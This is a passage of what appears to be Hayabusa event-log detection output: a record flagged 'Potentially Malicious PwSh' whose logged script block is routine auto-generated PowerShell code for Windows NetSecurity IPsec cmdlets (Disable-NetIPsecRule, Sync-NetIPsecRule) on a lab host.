[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"llProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 